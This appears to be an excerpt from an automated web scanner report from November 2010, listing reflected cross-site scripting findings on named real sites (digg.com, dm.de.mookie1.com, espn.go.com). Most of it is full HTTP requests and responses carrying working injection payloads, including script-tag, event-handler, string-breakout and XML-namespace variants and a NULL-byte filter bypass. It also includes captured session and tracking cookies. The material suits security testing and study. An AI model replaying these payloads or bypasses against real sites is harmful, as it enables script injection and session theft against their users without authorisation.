The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00e172c"><script>alert(1)</script>f7756b7702 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebbfb"><script>alert(1)</script>c9ded0707d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMebbfb"><script>alert(1)</script>c9ded0707d9/2010DM/146837268@x23 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:28 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22f69"><script>alert(1)</script>08006aab004 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM22f69"><script>alert(1)</script>08006aab004/146837268@x23 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5c0f"><script>alert(1)</script>7c6a11bd058 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/146837268@x23f5c0f"><script>alert(1)</script>7c6a11bd058 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:34 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de299"><script>alert(1)</script>d4f414c1327 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMde299"><script>alert(1)</script>d4f414c1327/DLX/11053880328@x95 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 331 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2fab"><script>alert(1)</script>3cd711156ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLXb2fab"><script>alert(1)</script>3cd711156ce/11053880328@x95 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 330 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39251"><script>alert(1)</script>ce638938be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLX/11053880328@x9539251"><script>alert(1)</script>ce638938be HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:35 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 322 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/
5.9. http://dm.de.mookie1.com/2/B3DM/DLX/11053880328@x95 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/DLX/11053880328@x95
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6da14'-alert(1)-'9c9e315e2c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2/B3DM/DLX/11053880328@x95?6da14'-alert(1)-'9c9e315e2c5=1 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:18 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3463 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/
<script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }
var dlx_segment_list = '6da14'-alert(1)-'9c9e315e2c5=1';
var dlx_segment_list_pairs=dlx_segment_list.split('|'); var ZAP_url='http://t.mookie1.com/t/v1/event?migClientId=1214&migAction=';
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edb57"><script>alert(1)</script>a664fc42d16 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMedb57"><script>alert(1)</script>a664fc42d16/DLX/11611717638@x92 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:27 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 331 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea58c"><script>alert(1)</script>27fa3aa330d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLXea58c"><script>alert(1)</script>27fa3aa330d/11611717638@x92 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:30 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 330 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 345ae"><script>alert(1)</script>0b9ea008699 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLX/11611717638@x92345ae"><script>alert(1)</script>0b9ea008699 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:33 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 323 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/
The value of the adminOver request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0933"%3balert(1)//f1709e21753 was submitted in the adminOver parameter. This input was echoed as a0933";alert(1)//f1709e21753 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:21:59 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:21:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN14 Cache-Expires: Sat, 06 Nov 2010 14:30:19 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 1371
The value of the autostart request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59854"%3balert(1)//cc78248a523 was submitted in the autostart parameter. This input was echoed as 59854";alert(1)//cc78248a523 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:23:20 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:23:20 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 14:31:40 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 1371
The value of the player request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb4ee"%3balert(1)//e664ff0054e was submitted in the player parameter. This input was echoed as fb4ee";alert(1)//e664ff0054e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:20:43 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:20:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 14:29:03 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 1399
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75580'%3b056a2319ce8 was submitted in the REST URL parameter 5. This input was echoed as 75580';056a2319ce8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /espn3/index/_/sport/basketball75580'%3b056a2319ce8 HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 06:23:50 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 06:23:50 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sun, 07 Nov 2010 06:32:10 GMT Content-Length: 772479 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <script type="text/javascript"> anTrackESPN3(0,'espn3',ud.name,'','','index','index',ud.name,'','en','basketball75580';056a2319ce8','');
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42000"><img%20src%3da%20onerror%3dalert(1)>f1469c47fb3 was submitted in the REST URL parameter 5. This input was echoed as 42000"><img src=a onerror=alert(1)>f1469c47fb3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /espn3/index/_/sport/basketball42000"><img%20src%3da%20onerror%3dalert(1)>f1469c47fb3 HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 06:23:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 06:23:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sun, 07 Nov 2010 06:31:45 GMT Content-Length: 772619 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <meta name="description" CONTENT="Enjoy live streaming Basketball42000"><img src=a onerror=alert(1)>f1469c47fb3 online on ESPN3.com. Never miss a game!" /> ...[SNIP]...
The value of the pageType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae11a"%3balert(1)//70dba98dd9 was submitted in the pageType parameter. This input was echoed as ae11a";alert(1)//70dba98dd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the adminOver request parameter is copied into the XML document as plain text between tags. The payload 89c9d<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>99ff36eea82 was submitted in the adminOver parameter. This input was echoed as 89c9d<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>99ff36eea82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:17:38 GMT Content-Type: text/xml;charset=UTF-8 Last-Modified: Sat, 06 Nov 2010 14:17:38 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Cache-Expires: Sat, 06 Nov 2010 14:25:58 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 6403
The value of the height request parameter is copied into a JavaScript rest-of-line comment. The payload dcdc8%0aalert(1)//e7db8367081 was submitted in the height parameter. This input was echoed as dcdc8 alert(1)//e7db8367081 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9dcdc8%0aalert(1)//e7db8367081&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:19:26 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:19:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 14:27:46 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3092
The value of the height request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f548a'%3balert(1)//361c204b438 was submitted in the height parameter. This input was echoed as f548a';alert(1)//361c204b438 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=f548a'%3balert(1)//361c204b438&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; 